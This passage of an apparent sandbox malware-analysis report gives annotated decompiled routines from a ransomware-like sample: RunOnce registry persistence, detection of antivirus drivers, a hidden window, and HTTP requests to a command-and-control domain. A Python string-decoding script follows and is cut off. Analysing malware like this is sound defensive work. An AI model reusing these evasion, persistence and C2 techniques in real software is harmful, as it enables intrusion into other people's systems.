                                        				if( *0xf9e2a44 == 0) {
                                        					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        					 *0xf9e2a44 = _t45;
                                        					if(_t45 != 0) {
                                        						wsprintfW(_t45, L"%s",  &_a8);
                                        					}
                                        				}
                                        				VirtualFree(_a128, 0, 0x8000);
                                        				_t44 = E0F9D7C10( &_a136);
                                        				return _t44;
                                        			}

                                        0x0f9d41d6
                                        0x0f9d41e0
                                        0x0f9d41e0
                                        0x0f9d41e7
                                        0x0f9d41e8
                                        0x0f9d41f4
                                        0x0f9d4208
                                        0x0f9d420c
                                        0x0f9d4210
                                        0x0f9d4210
                                        0x0f9d4212
                                        0x0f9d4224
                                        0x0f9d4228
                                        0x0f9d422d
                                        0x0f9d4236
                                        0x00000000
                                        0x00000000
                                        0x0f9d423a
                                        0x0f9d423d
                                        0x0f9d4243
                                        0x0f9d4243
                                        0x0f9d424b
                                        0x00000000
                                        0x0f9d4250
                                        0x0f9d4250
                                        0x0f9d4250
                                        0x0f9d4256
                                        0x00000000
                                        0x00000000
                                        0x0f9d4260
                                        0x0f9d4262
                                        0x0f9d426d
                                        0x0f9d4271
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4264
                                        0x0f9d4264
                                        0x0f9d426b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d426b
                                        0x00000000
                                        0x0f9d4262
                                        0x0f9d43ce
                                        0x00000000
                                        0x0f9d43ce
                                        0x00000000
                                        0x0f9d4277
                                        0x0f9d4277
                                        0x0f9d4277
                                        0x0f9d427b
                                        0x0f9d427e
                                        0x0f9d4281
                                        0x00000000
                                        0x0f9d4243
                                        0x0f9d4210
                                        0x0f9d4286
                                        0x0f9d428d
                                        0x0f9d4295
                                        0x0f9d429d
                                        0x0f9d42a5
                                        0x0f9d42ad
                                        0x0f9d42b5
                                        0x0f9d42bd
                                        0x0f9d42c5
                                        0x0f9d42cd
                                        0x0f9d42d5
                                        0x0f9d42dd
                                        0x0f9d42e5
                                        0x0f9d42ed
                                        0x0f9d42f5
                                        0x0f9d42fd
                                        0x0f9d4305
                                        0x0f9d430d
                                        0x0f9d4315
                                        0x0f9d431d
                                        0x0f9d4325
                                        0x0f9d432d
                                        0x0f9d4335
                                        0x0f9d433d
                                        0x0f9d4345
                                        0x0f9d434d
                                        0x0f9d4355
                                        0x0f9d435d
                                        0x0f9d4365
                                        0x0f9d436d
                                        0x0f9d4375
                                        0x0f9d4385
                                        0x0f9d438b
                                        0x0f9d4392
                                        0x0f9d439f
                                        0x0f9d43a5
                                        0x0f9d4392
                                        0x0f9d43b6
                                        0x0f9d43c3
                                        0x0f9d43cd

                                        APIs
                                        • lstrcpyW.KERNEL32 ref: 0F9D4212
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4219
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D4385
                                        • wsprintfW.USER32 ref: 0F9D439F
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D43B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
• Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
                                        • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
                                        • API String ID: 4033391921-3341315666
                                        • Opcode ID: 5e2bc8b57a2e8dd9c989ce577d157cd50c197d538cb3fb0108f7213c47f6e1b2
                                        • Instruction ID: bdef4670d4e6e9611c6fe0d843e6577e2dde8ef92e158d646d22250ee7fdf2a4
                                        • Opcode Fuzzy Hash: 5e2bc8b57a2e8dd9c989ce577d157cd50c197d538cb3fb0108f7213c47f6e1b2
                                        • Instruction Fuzzy Hash: 57419C70508341CBE720DF14C54876ABFE6FB81799F64891CF6880B292D7FA8599CF52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E0F9D2960(WCHAR* __ecx, void* __eflags) {
                                        				void* _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				short _v32;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				intOrPtr _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				intOrPtr _v120;
                                        				intOrPtr _v124;
                                        				intOrPtr _v128;
                                        				intOrPtr _v132;
                                        				intOrPtr _v136;
                                        				short _v140;
                                        				WCHAR* _t58;
                                        
                                        				_t58 = __ecx;
                                        				_v32 = 0x520050;
                                        				_v28 = 0x440049;
                                        				_push(0x41);
                                        				_v24 = 0x520055;
                                        				_v20 = 0x530041;
                                        				_v16 = 0x4b0048;
                                        				_v12 = 0x41;
                                        				E0F9D8150( &_v32, lstrlenW( &_v32));
                                        				_v140 = 0x4f0053;
                                        				_v136 = 0x540046;
                                        				_v132 = 0x410057;
                                        				_v128 = 0x450052;
                                        				_v124 = 0x4d005c;
                                        				_v120 = 0x630069;
                                        				_v116 = 0x6f0072;
                                        				_v112 = 0x6f0073;
                                        				_v108 = 0x740066;
                                        				_v104 = 0x57005c;
                                        				_v100 = 0x6e0069;
                                        				_v96 = 0x6f0064;
                                        				_v92 = 0x730077;
                                        				_v88 = 0x43005c;
                                        				_v84 = 0x720075;
                                        				_v80 = 0x650072;
                                        				_v76 = 0x74006e;
                                        				_v72 = 0x650056;
                                        				_v68 = 0x730072;
                                        				_v64 = 0x6f0069;
                                        				_v60 = 0x5c006e;
                                        				_v56 = 0x750052;
                                        				_v52 = 0x4f006e;
                                        				_v48 = 0x63006e;
                                        				_v44 = 0x65;
                                        				if(RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0) != 0) {
                                        					return 0;
                                        				} else {
                                        					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47);
                                        					asm("sbb esi, esi");
                                        					RegCloseKey(_v8);
                                        					_t39 =  &(_t58[0]); // 0x1
                                        					return _t39;
                                        				}
                                        			}
                                        0x0f9d296b
                                        0x0f9d296d
                                        0x0f9d2979
                                        0x0f9d2980
                                        0x0f9d2984
                                        0x0f9d298c
                                        0x0f9d2993
                                        0x0f9d299a
                                        0x0f9d29a8
                                        0x0f9d29b0
                                        0x0f9d29bd
                                        0x0f9d29c7
                                        0x0f9d29ce
                                        0x0f9d29eb
                                        0x0f9d29f8
                                        0x0f9d29ff
                                        0x0f9d2a06
                                        0x0f9d2a0d
                                        0x0f9d2a14
                                        0x0f9d2a1b
                                        0x0f9d2a22
                                        0x0f9d2a29
                                        0x0f9d2a30
                                        0x0f9d2a37
                                        0x0f9d2a3e
                                        0x0f9d2a45
                                        0x0f9d2a4c
                                        0x0f9d2a53
                                        0x0f9d2a5a
                                        0x0f9d2a61
                                        0x0f9d2a68
                                        0x0f9d2a6f
                                        0x0f9d2a76
                                        0x0f9d2a7d
                                        0x0f9d2a8c
                                        0x0f9d2ac7
                                        0x0f9d2a8e
                                        0x0f9d2aa4
                                        0x0f9d2aaf
                                        0x0f9d2ab1
                                        0x0f9d2ab7
                                        0x0f9d2abf
                                        0x0f9d2abf

                                        APIs
                                        • lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0F9D299D
                                          • Part of subcall function 0F9D8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D816D
                                          • Part of subcall function 0F9D8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F9D819B
                                          • Part of subcall function 0F9D8150: GetModuleHandleA.KERNEL32(?), ref: 0F9D81EF
                                          • Part of subcall function 0F9D8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D81FD
                                          • Part of subcall function 0F9D8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D820C
                                          • Part of subcall function 0F9D8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8255
                                          • Part of subcall function 0F9D8150: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8263
                                        • RegCreateKeyExW.ADVAPI32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F9D2C45,00000000), ref: 0F9D2A84
                                        • lstrlenW.KERNEL32(00000000), ref: 0F9D2A8F
                                        • RegSetValueExW.ADVAPI32(0F9D2C45,00520050,00000000,00000001,00000000,00000000), ref: 0F9D2AA4
                                        • RegCloseKey.ADVAPI32(0F9D2C45), ref: 0F9D2AB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
• Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
                                        • String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
                                        • API String ID: 553367697-3791882466
                                        • Opcode ID: fb18767f14730c885fc456d5cd8ff6945c52713ca969cf888927546bd05e14b1
                                        • Instruction ID: d48cc2fa45286989a46075163706fb35882ddb295905790725ed96fe2a3e69b5
                                        • Opcode Fuzzy Hash: fb18767f14730c885fc456d5cd8ff6945c52713ca969cf888927546bd05e14b1
                                        • Instruction Fuzzy Hash: 5C31EDB090121DDFEB20CF91E948BEDBFB9FB01709F208159D5186A282D7BA4558CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                         			// Routine in the module mapped at 0F9D0000. The three driver file names it
                                         			// checks for are built as UTF-16LE stack strings, two characters per 32-bit
                                         			// store, so none of them exists as a contiguous string in the image.
                                         			// E0F9D2F50 (see the APIs list below) enumerates loaded drivers with
                                         			// EnumDeviceDrivers/GetDeviceDriverBaseNameW and compares every base name
                                         			// against the name passed in with lstrcmpiW; non-zero means "driver loaded".
                                         			E0F9D2D30() {
                                         				struct _WNDCLASSEXW _v52;
                                         				struct tagMSG _v84;      // also reused as scratch space for two of the stack strings
                                         				intOrPtr _v88;
                                         				intOrPtr _v92;
                                         				char _v96;
                                         				short _t42;
                                         				void* _t49;
                                         				void* _t61;
                                         				void* _t62;
                                         				void* _t67;
                                         				void* _t69;
                                         				long _t71;
                                         
                                         				_push(_t62);
                                         				_push(_t69);
                                         				_v84.message = 0x6c006b;   // "kl"  -> _v84.message.._v84.pt spell L"klif.sys" (Kaspersky driver)
                                         				_push(_t67);
                                         				_v84.wParam = 0x660069;    // "if"
                                         				_v84.lParam = 0x73002e;    // ".s"
                                         				_v84.time = 0x730079;      // "ys"
                                         				_v84.pt = 0;               // terminator
                                         				_v96 = 0x6c006b;           // "kl"  -> _v96.._v84.hwnd spell L"kl1.sys" (Kaspersky driver)
                                         				_v92 = 0x2e0031;           // "1."
                                         				_v88 = 0x790073;           // "sy"
                                         				_v84.hwnd = 0x73;          // "s" + terminator
                                         				if(E0F9D2F50( &(_v84.message)) != 0 || E0F9D2F50( &_v96) != 0) {
                                         					// Either Kaspersky driver is loaded: E0F9D30A0 and E0F9D2AD0 are skipped
                                         					// and execution goes straight to the window setup.
                                         					L5:
                                         					_v52.cbSize = 0x30;                   // sizeof(WNDCLASSEXW)
                                         					_v52.style = 3;                       // CS_HREDRAW | CS_VREDRAW
                                         					_v52.lpfnWndProc = E0F9D2C50;
                                         					_v52.cbClsExtra = 0;
                                         					_v52.cbWndExtra = 0;
                                         					_v52.hInstance = GetModuleHandleW(0);
                                         					_v52.hIcon = 0;
                                         					_v52.hCursor = LoadCursorW(0, 0x7f00);   // IDC_ARROW
                                         					_v52.hbrBackground = 6;                  // COLOR_WINDOW + 1
                                         					_v52.lpszMenuName = 0;
                                         					_v52.lpszClassName = L"win32app";
                                         					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);   // IDI_APPLICATION
                                         					_t42 = RegisterClassExW( &_v52);
                                         					_push(0);
                                         					if(_t42 != 0) {
                                         						GetModuleHandleW();
                                         						// 5x5 pixel WS_OVERLAPPEDWINDOW (0xcf0000) titled "firefox" at the default
                                         						// position (CW_USEDEFAULT = 0x80000000); the style is then cleared via
                                         						// GWL_STYLE (-16).
                                         						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
                                         						SetWindowLongW(_t71, 0xfffffff0, 0);
                                         						if(_t71 != 0) {
                                         							ShowWindow(_t71, 5);   // SW_SHOW
                                         							UpdateWindow(_t71);
                                         							// Worker thread E0F9D2D10 gets the window handle as its parameter; the
                                         							// thread handle itself is closed right away.
                                         							_t49 = CreateThread(0, 0, E0F9D2D10, _t71, 0, 0);
                                         							if(_t49 != 0) {
                                         								CloseHandle(_t49);
                                         							}
                                         							// Message pump. It ends when the window procedure E0F9D2C50 returns
                                         							// 0xdeadbeef (DispatchMessageW returns the WndProc result) or the queue closes.
                                         							if(GetMessageW( &_v84, 0, 0, 0) != 0) {
                                         								do {
                                         									TranslateMessage( &_v84);
                                         								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
                                         							}
                                         							goto L15;
                                         						}
                                         						ExitThread(_t71);
                                         					}
                                         					ExitThread();
                                         				} else {
                                         					_v84.message = 0x730066;   // "fs"  -> L"fsdfw.sys"
                                         					_v84.wParam = 0x660064;    // "df"
                                         					_v84.lParam = 0x2e0077;    // "w."
                                         					_v84.time = 0x790073;      // "sy"
                                         					_v84.pt = 0x73;            // "s" + terminator
                                         					if(E0F9D2F50( &(_v84.message)) != 0) {
                                         						// fsdfw.sys is loaded: the thread terminates without doing anything else.
                                         						L15:
                                         						ExitThread(0);
                                         					}
                                         					// A non-zero result from E0F9D30A0 also terminates. Otherwise E0F9D2AD0
                                         					// runs first (per the APIs list: VirtualAlloc of 0x800 bytes with
                                         					// PAGE_EXECUTE_READWRITE, GetModuleFileNameW, GetTempPathW) and only
                                         					// then is the window created.
                                         					_t61 = E0F9D30A0(_t62, _t67, _t69);
                                         					if(_t61 != 0) {
                                         						goto L15;
                                         					}
                                         					_push(_t61);
                                         					E0F9D2AD0();
                                         					goto L5;
                                         				}
                                         			}
                                         
                                         Instruction addresses (one per decompiled line in the original report): 0x0f9d2d39 .. 0x0f9d2f3f

                                        APIs
                                          • Part of subcall function 0F9D2F50: EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 0F9D2F74
                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F9D2E19
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0F9D2E2E
                                        • LoadIconW.USER32 ref: 0F9D2E59
                                        • RegisterClassExW.USER32 ref: 0F9D2E68
                                        • ExitThread.KERNEL32 ref: 0F9D2E75
                                          • Part of subcall function 0F9D2F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F9D2F8D
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F9D2E7B
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F9D2E81
                                        • CreateWindowExW.USER32 ref: 0F9D2EA7
                                        • SetWindowLongW.USER32 ref: 0F9D2EB4
                                        • ExitThread.KERNEL32 ref: 0F9D2EBF
                                          • Part of subcall function 0F9D2F50: EnumDeviceDrivers.PSAPI(00000000,00000000,?), ref: 0F9D2FA8
                                          • Part of subcall function 0F9D2F50: GetDeviceDriverBaseNameW.PSAPI(00000000,?,00000400), ref: 0F9D2FCF
                                          • Part of subcall function 0F9D2F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F9D2FE3
                                          • Part of subcall function 0F9D2F50: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D2FFA
                                        • ExitThread.KERNEL32 ref: 0F9D2F3F
                                          • Part of subcall function 0F9D2AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F9D2AEA
                                          • Part of subcall function 0F9D2AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D2B2C
                                          • Part of subcall function 0F9D2AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F9D2B38
                                          • Part of subcall function 0F9D2AD0: ExitThread.KERNEL32 ref: 0F9D2C47
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F9D2EC8
                                        • UpdateWindow.USER32(00000000), ref: 0F9D2ECF
                                        • CreateThread.KERNEL32 ref: 0F9D2EE3
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F9D2EEE
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F9D2F05
                                        • TranslateMessage.USER32(?), ref: 0F9D2F1C
                                        • DispatchMessageW.USER32 ref: 0F9D2F23
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F9D2F37
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
                                        • String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
                                        • API String ID: 3011903443-520298170
                                        • Opcode ID: dd101fe91ddf72711ca9ebebd399a984b366423cb6c52d79be93b1cae54eaa79
                                        • Instruction ID: ed824f0ce8f8965badd5dc97d6c2dd60581aa0ff5608e7108fb867421c6f0b72
                                        • Opcode Fuzzy Hash: dd101fe91ddf72711ca9ebebd399a984b366423cb6c52d79be93b1cae54eaa79
                                        • Instruction Fuzzy Hash: 9751817014D301AFF3209F61CC09B5B7BE8AF44B59F20891CF684AA1C2D7B9A559CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                         			// WinINet HTTP request helper. __ecx points at a context whose field at
                                         			// offset 4 holds the session handle. Arguments: _a4 server name, _a8 URL
                                         			// path, _a12/_a16 optional request body and its length, _a20/_a24 response
                                         			// buffer and its size, _a36 HTTP verb, _a40/_a44 extra headers and length.
                                         			// Returns 1 when at least one response byte was read, 0 otherwise.
                                         			E0F9D7EF0(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
                                         				long _v12;
                                         				void* _v16;
                                         				void* _v20;
                                         				intOrPtr _v24;
                                         				intOrPtr _v28;
                                         				intOrPtr _v32;
                                         				intOrPtr _v36;
                                         				intOrPtr _v40;
                                         				intOrPtr _v44;
                                         				intOrPtr _v48;
                                         				intOrPtr _v52;
                                         				intOrPtr _v56;
                                         				intOrPtr _v60;
                                         				intOrPtr _v64;
                                         				short _v68;          // first word of the stack-string Host header (_v68 .. _v24)
                                         				void* _t38;
                                         				void* _t40;
                                         				long _t54;
                                         				long _t59;
                                         				WCHAR* _t62;
                                         				void* _t63;
                                         				void* _t64;
                                         				void* _t65;
                                         				void* _t67;
                                         
                                         				_t64 = __ecx;
                                         				_t38 =  *(__ecx + 4);
                                         				if(_t38 != 0) {
                                         					InternetCloseHandle(_t38);   // drop the previous session handle
                                         				}
                                         				E0F9D7CE0(_t64);                 // runs before the handle at +4 is used again
                                         				// Plain HTTP (INTERNET_SERVICE_HTTP = 3) to _a4 on port 80 (0x50).
                                         				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0);
                                         				_t65 = _t40;
                                         				_v12 = 0;
                                         				_v16 = _t65;
                                         				if(_t65 != 0) {
                                         					// 0x2800-byte PAGE_EXECUTE_READWRITE (0x40) buffer holding the path string.
                                         					_t62 = VirtualAlloc(0, 0x2800, 0x3000, 0x40);
                                         					_v20 = _t62;
                                         					wsprintfW(_t62, L"%s", _a8);
                                         					// 0x8404f700 = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTH
                                         					//   | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
                                         					//   | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | INTERNET_FLAG_IGNORE_CERT_CN_INVALID
                                         					//   | INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_NO_UI | INTERNET_FLAG_PRAGMA_NOCACHE
                                         					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
                                         					if(_t63 != 0) {
                                         						// UTF-16LE stack string, two characters per store: L"Host: nomoreransom.coin".
                                         						// It is added unconditionally, so the Host header carries the C2 domain
                                         						// whatever server name arrived in _a4 (the stack shown for the VirtualAlloc
                                         						// call above indicates the caller at 0F9D6EE6 passes ipv4bot.whatismyipaddress.com).
                                         						_v68 = 0x6f0048;   // "Ho"
                                         						_v64 = 0x740073;   // "st"
                                         						_v60 = 0x20003a;   // ": "
                                         						_v56 = 0x6f006e;   // "no"
                                         						_v52 = 0x6f006d;   // "mo"
                                         						_v48 = 0x650072;   // "re"
                                         						_v44 = 0x610072;   // "ra"
                                         						_v40 = 0x73006e;   // "ns"
                                         						_v36 = 0x6d006f;   // "om"
                                         						_v32 = 0x63002e;   // ".c"
                                         						_v28 = 0x69006f;   // "oi"
                                         						_v24 = 0x6e;       // "n" + terminator
                                         						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {   // length -1: NUL-terminated header
                                         							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
                                         								GetLastError();   // result is discarded
                                         							} else {
                                         								// Read the response into _a20 in chunks of _a24 - 1 bytes and NUL-terminate
                                         								// after each chunk. Every read restarts at the buffer start, so only the last
                                         								// chunk survives; _v12 only records that something arrived. The _a4 slot is
                                         								// reused as the bytes-read counter.
                                         								_t67 = _a20;
                                         								_t59 = _a24 - 1;
                                         								_a4 = 0;
                                         								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
                                         									while(1) {
                                         										_t54 = _a4;
                                         										if(_t54 == 0) {
                                         											goto L13;
                                         										}
                                         										 *((char*)(_t54 + _t67)) = 0;
                                         										_a4 = 0;
                                         										_v12 = 1;
                                         										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
                                         											continue;
                                         										} else {
                                         										}
                                         										goto L13;
                                         									}
                                         								}
                                         							}
                                         						}
                                         					}
                                         					L13:
                                         					InternetCloseHandle(_t63);
                                         					InternetCloseHandle(_v16);
                                         					VirtualFree(_v20, 0, 0x8000);   // MEM_RELEASE
                                         					return _v12;
                                         				} else {
                                         					return _t40;   // 0: InternetConnectW failed
                                         				}
                                         			}
                                         
                                         Instruction addresses (one per decompiled line in the original report): 0x0f9d7ef8 .. 0x0f9d8089

                                        APIs
                                        • InternetCloseHandle.WININET(?), ref: 0F9D7F03
                                        • InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F9D7F22
                                        • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F9D6EE6,ipv4bot.whatismyipaddress.com,0F9DFF10), ref: 0F9D7F4F
                                        • wsprintfW.USER32 ref: 0F9D7F63
                                        • HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F9D7F81
                                        • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F9D7FEE
                                        • HttpSendRequestW.WININET(00000000,00650072,006F006D,00000000,0000006E), ref: 0F9D8005
                                        • InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0F9D8024
                                        • InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0F9D8050
                                        • GetLastError.KERNEL32 ref: 0F9D805C
                                        • InternetCloseHandle.WININET(00000000), ref: 0F9D8069
                                        • InternetCloseHandle.WININET(00000000), ref: 0F9D806E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D6EE6), ref: 0F9D807A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
                                        • String ID: .$:$H$HTTP/1.1$m$n$n$n$o$o$r$r$s
                                        • API String ID: 3906118045-3956618741
                                        • Opcode ID: a5185331b08e407ddc99e68baf2b406a7829f8ed8850cf6cfe8c200f05a273f7
                                        • Instruction ID: add1e3e8d9089d497ee8dcb87b67e8f7400d7a7f3856858366b6aa17cbdbd84f
                                        • Opcode Fuzzy Hash: a5185331b08e407ddc99e68baf2b406a7829f8ed8850cf6cfe8c200f05a273f7
                                        • Instruction Fuzzy Hash: 38418171600218BFEB208F55DC49FEE7FBDEF44B95F208019F904A62C2C7B599648BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%
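
                                         The driver names in E0F9D2D30 and the Host header in E0F9D7EF0 only appear in the listings as 32-bit immediates. The script below is an added example, not part of the Joe Sandbox report or of the sample, that turns such listings back into text: it maps the decompiler's local names to frame offsets (assumed convention: _vN lives at frame offset -N, and a tagMSG member adds its 32-bit member offset, which matters because E0F9D2D30 reuses its MSG local _v84 as scratch space), orders the stores by address and decodes them as UTF-16LE. The immediates are copied from the two listings above; everything else is constructed for the example.

```python
import struct

# Member offsets of the 32-bit tagMSG structure. E0F9D2D30 writes two of its
# strings into the MSG local _v84, so each member must be mapped to its address.
MSG_FIELD_OFFSETS = {"hwnd": 0, "message": 4, "wParam": 8, "lParam": 12, "time": 16, "pt": 20}


def frame_offset(local, field=None):
    """Map a decompiler local such as '_v84' (assumed to sit at frame offset -84)
    plus an optional tagMSG member name to a frame offset."""
    base = -int(local[2:])
    return base + (MSG_FIELD_OFFSETS[field] if field is not None else 0)


def decode_stack_string(stores):
    """Rebuild a UTF-16LE string from 32-bit stack stores.

    stores maps frame offset -> immediate. Lower offsets are lower addresses,
    so sorting ascending restores memory order; every immediate is serialized
    little-endian, exactly as the mov wrote it, and the text is cut at the
    first NUL character (a store of 0 or a single trailing character)."""
    raw = b"".join(struct.pack("<I", value & 0xFFFFFFFF)
                   for _, value in sorted(stores.items()))
    text = raw.decode("utf-16-le", errors="replace")
    nul = text.find("\x00")
    return text if nul < 0 else text[:nul]


def stores_from_listing(assignments):
    """assignments: (local, tagMSG member or None, immediate) tuples as read
    off the decompiled listing, in source order."""
    return {frame_offset(local, field): value for local, field, value in assignments}


# Immediates copied from the E0F9D2D30 listing (first branch, then the else branch).
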